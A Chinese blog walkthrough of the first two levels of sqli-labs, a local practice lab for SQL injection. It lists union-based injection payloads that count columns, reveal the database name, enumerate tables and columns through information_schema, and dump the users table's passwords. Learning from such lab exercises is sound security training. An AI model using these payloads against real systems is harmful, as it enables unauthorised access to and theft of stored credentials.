sqli-labs-master通关手册

level1
输入:[http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1](http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1)

后面加一个'并将后面注释掉试试效果:
构造?id=1' --+(这里#被注释了)
image.png

然后判断字段数
?id=1' order by 3 --+
order by 3的时候回显正常,order by 4的时候报错,那证明字段就是3个。

然后判断注入点
?id=0' union select 1,2,3 --+
image.png

2和3是注入点,随便找个位置开始注入
?id=0' union select 1,database(),3 --+
image.png

数据库名爆出来了,security

然后爆表名:
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
因为这里只显示一行,虽然后面的LIMIT 0,1被注释掉了,但是后台可能还有其他函数限制输出,所以用group_concat()来将所有输出整在一行内image.png

猜测flag应该在users表中
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
image.png

maybe在password字段中
?id=-1' union select 1,group_concat(password),3 from users --+
image.png

okok搞定



level2
首先构造?id=1'--+发现报错,那这个应该不是字符类型
然后判断字段数?id=1 order by 3 --+image.png

然后构造?id=1 union select 1,2,3 --+
发现注入点,接下来的操作跟上一题一样,就不做介绍了,直接贴payload
?id=1 union select 1,database(),3 --+

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+

?id=-1 union select 1,group_concat(password),3 from users --+



发布了8 篇原创文章 · 获赞 22 · 访问量 3218

猜你喜欢

转载自blog.csdn.net/satasun/article/details/105614324